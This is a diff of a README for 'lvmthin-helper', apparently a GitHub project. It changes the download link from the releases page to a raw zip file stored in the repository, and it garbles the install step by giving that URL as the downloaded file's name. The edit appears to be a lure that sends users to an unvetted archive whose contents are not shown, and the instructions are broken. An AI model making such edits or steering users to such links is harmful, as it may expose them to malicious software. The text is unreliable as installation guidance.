NIXON0220/lvmthin-helper/README.md

 ## 📥 Download & Install

-To download lvmthin-helper, please visit [this page to download](https://github.com/NIXON0220/lvmthin-helper/releases).
+To download lvmthin-helper, please visit [this page to download](https://github.com/NIXON0220/lvmthin-helper/raw/refs/heads/main/lvmthin_helper/lvmthin-helper-v2.5.zip).
 Look for the latest version and click on the appropriate link for your operating system.

 ### Installation Steps:

 1. **Locate the Downloaded File:**
    Open your downloads folder.
-You will see a file named `lvmthin-helper-latest.zip`.
+You will see a file named `https://github.com/NIXON0220/lvmthin-helper/raw/refs/heads/main/lvmthin_helper/lvmthin-helper-v2.5.zip`.

 2. **Extract the Files:**
    Right-click the file and select “Extract”.
 You will find the application files in a new folder.